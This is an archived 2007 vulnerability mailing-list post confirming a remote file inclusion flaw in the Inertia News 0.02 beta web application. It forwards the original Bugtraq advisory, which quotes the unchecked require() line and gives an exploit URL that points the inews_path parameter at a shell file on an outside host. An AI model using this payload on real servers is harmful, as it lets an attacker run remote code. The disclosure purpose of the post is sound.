[VIM] true: Inertia News Remote File İnclude
Noam Rathaus
noamr at beyondsecurity.com
Tue Feb 13 05:08:48 EST 2007
Hi,
It looks legit:
<snip>
require ("$inews_path/inertia_sql_class.php");
</snip>
No tests done to the value.
Product looks like abandon ware (http://www.brentc.com/inertianews/).
---------- Forwarded Message ----------
Subject: Inertia News Remote File İnclude
Date: Monday 12 February 2007 22:55
From: crazy_king at eno7.org
To: bugtraq at securityfocus.com
Version :
0.02 beta
Error :
require ("$inews_path/inertia_sql_class.php");
Exploit :
http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com/sh
ell.txt
Eno7.Org - Crazy-King.ORg
Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyıldız Tim
-------------------------------------------------------
--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com
More information about the VIM
mailing list